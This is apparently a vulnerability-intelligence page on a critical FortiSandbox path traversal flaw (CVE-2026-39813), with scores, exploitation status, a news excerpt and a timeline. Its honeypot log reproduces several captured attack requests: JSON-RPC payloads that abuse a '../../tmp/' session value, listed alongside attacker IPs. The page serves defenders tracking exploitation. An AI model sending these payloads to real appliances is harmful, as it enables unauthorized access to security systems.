Vulnerability Detail
Enriched intelligence for a single CVE
Critical
CVE-2026-39813
PUBLISHEDA path traversal: '../filedir' vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8 may allow attacker to...
Not yet in CISA KEV
- Vendor
- Fortinet
- Product
- FortiSandbox, FortiSandbox Cloud
- Published
- Apr 14, 2026
- EPSS
- 23.6% · 98% pctl
Automate This Intelligence with the Pro API
Everything on this page — CVSS, EPSS, exploit status, PoCs, scanner integrations, mentions, tags, and immediate honeypot data — is available programmatically for VM, SOC, and CTI workflows.
Description
A path traversal: '../filedir' vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8 may allow attacker to escalation of privilege via
Weaknesses (CWE)
-
Path Traversal: '../filedir'
CVSS Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitation Status
Exploited in the wild
Recorded 2026-06-16 15:17:57 UTC · Defused Cyber
Active exploitation observed
Recorded 2026-06-15 12:48:52 UTC · KEVIntel sensor
Proof of concept available
Recorded 2026-04-21 17:10:00 UTC
Observed Exploitation Attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts Observed
- 8
- Unique Attacker IPs
- 3
- Attacker Countries
- 🇧🇬 🇮🇳 🇸🇬
- Sensors Observed
- 1
Exploitation Attempts Over the Last 30 Days
First observed 2026-06-15 12:48 UTC · Last observed 2026-06-16 19:02 UTC
Recent Attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
|
2026-06-16 19:02 UTC
about 3 hours ago
|
🇧🇬 5.188.206.226Bulgaria Seen 2 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
High |
View Hide
Attacker
5.188.206.226
🇧🇬
Bulgaria
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Payload fingerprint
sha256:c7e1870a6a37f9ba7232b825f5ff1bc97c43814e31b002a4e9a88b08561e753d
Payload
{"id": 1, "session": "../../tmp/", "method": "get", "params": [{"url": "sys/status"}], "ver": "2.0"}
Source
KEVIntel Honeypot
|
|
2026-06-16 18:53 UTC
about 4 hours ago
|
🇧🇬 5.188.206.226Bulgaria Seen 2 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
High |
View Hide
Attacker
5.188.206.226
🇧🇬
Bulgaria
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Payload fingerprint
sha256:c7e1870a6a37f9ba7232b825f5ff1bc97c43814e31b002a4e9a88b08561e753d
Payload
{"id": 1, "session": "../../tmp/", "method": "get", "params": [{"url": "sys/status"}], "ver": "2.0"}
Source
KEVIntel Honeypot
|
|
2026-06-16 15:06 UTC
about 7 hours ago
|
🇮🇳 115.97.7.248Chennai, Tamil Nadu, India Seen 5 times |
🇪🇺
FortiSandbox
|
POST /jsonrpc/
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
|
High |
View Hide
Attacker
115.97.7.248
🇮🇳
Chennai, Tamil Nadu, India
Request
POST /jsonrpc/
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Payload fingerprint
sha256:08175a2c814df013a36c4ba5c0f39af1625a72a7422c13ea87b74e1f19e8c7b1
Payload
{"id": 1, "ver": "2.0", "session": "../../tmp/", "method": "get", "params": [{"url": "sys/status"}]}
Source
KEVIntel Honeypot
|
|
2026-06-16 15:03 UTC
about 7 hours ago
|
🇮🇳 115.97.7.248Chennai, Tamil Nadu, India Seen 5 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
|
High |
View Hide
Attacker
115.97.7.248
🇮🇳
Chennai, Tamil Nadu, India
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Payload fingerprint
sha256:c0c1b3a48caccc354999a1ed278923b5ab16b222e41464d20fb14e65f943f78d
Payload
{"id": 2, "ver": "2.0", "session": "../../tmp/", "method": "get", "params": [{"url": "sys/system_resource"}]}
Source
KEVIntel Honeypot
|
|
2026-06-16 15:03 UTC
about 7 hours ago
|
🇮🇳 115.97.7.248Chennai, Tamil Nadu, India Seen 5 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
|
High |
View Hide
Attacker
115.97.7.248
🇮🇳
Chennai, Tamil Nadu, India
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
Payload fingerprint
sha256:6a7979f3bf2d4fd1fd565f6f22f605d20303f5f700bb15128bb88dba9a455698
Payload
{"id": 1, "ver": "2.0", "session": "../../tmp/", "method": "get", "params": [{"url": "sys/status"}]}
Source
KEVIntel Honeypot
|
|
2026-06-16 14:59 UTC
about 7 hours ago
|
🇮🇳 115.97.7.248Chennai, Tamil Nadu, India Seen 5 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
|
High |
View Hide
Attacker
115.97.7.248
🇮🇳
Chennai, Tamil Nadu, India
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
Payload fingerprint
sha256:c0c1b3a48caccc354999a1ed278923b5ab16b222e41464d20fb14e65f943f78d
Payload
{"id": 2, "ver": "2.0", "session": "../../tmp/", "method": "get", "params": [{"url": "sys/system_resource"}]}
Source
KEVIntel Honeypot
|
|
2026-06-16 14:59 UTC
about 7 hours ago
|
🇮🇳 115.97.7.248Chennai, Tamil Nadu, India Seen 5 times |
🇪🇺
FortiSandbox
|
POST /fortisandbox/jsonrpc/
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
|
High |
View Hide
Attacker
115.97.7.248
🇮🇳
Chennai, Tamil Nadu, India
Request
POST /fortisandbox/jsonrpc/
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Payload fingerprint
sha256:6a7979f3bf2d4fd1fd565f6f22f605d20303f5f700bb15128bb88dba9a455698
Payload
{"id": 1, "ver": "2.0", "session": "../../tmp/", "method": "get", "params": [{"url": "sys/status"}]}
Source
KEVIntel Honeypot
|
|
2026-06-15 12:48 UTC
1 day ago
|
🇸🇬 141.11.43.175Singapore, Singapore |
🇪🇺
FortiSandbox
|
POST /jsonrpc/
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
|
High |
View Hide
Attacker
141.11.43.175
🇸🇬
Singapore, Singapore
Request
POST /jsonrpc/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
Payload fingerprint
sha256:cbdae30e013d80f4dc7651b625e58a5f65a73a7593ad3d91355c7c73fa7da42c
Payload
{"id": 1, "session": "../../tmp/", "method": "get", "params": [{"url":"sys/status"}],"ver":"5.0"}
Source
KEVIntel Honeypot
|
Known Exploited Vulnerability Sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| Defused Cyber First | 2026-06-16 15:17 UTC |
| KEVIntel | 2026-06-15 12:48 UTC |
Recent Mentions
TheHackerNews · Jun 16, 2026
Bad actors are exploiting multiple security vulnerabilities in Fortinet FortiSandbox, according to threat intelligence firm Defused Cyber. In a post shared on X, the company said it has observed exploitation of CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089 over the past 24 hours. CVE-2026-39813 (CVSS score: 9.1) refers to a path traversal vulnerability in FortiSandbox JRPC API that could
Potential Proof of Concepts
These PoCs are unverified and could contain malware. Use at your own risk.
public · Created 2026-04-21 17:10:00 UTC
Timeline
-
Added to KEVIntel
-
KEV confirmed by KEVIntel Honeypot Sensors
-
Proof of Concept Exploit Available
-
CVE Published to Public
-
CVE ID Reserved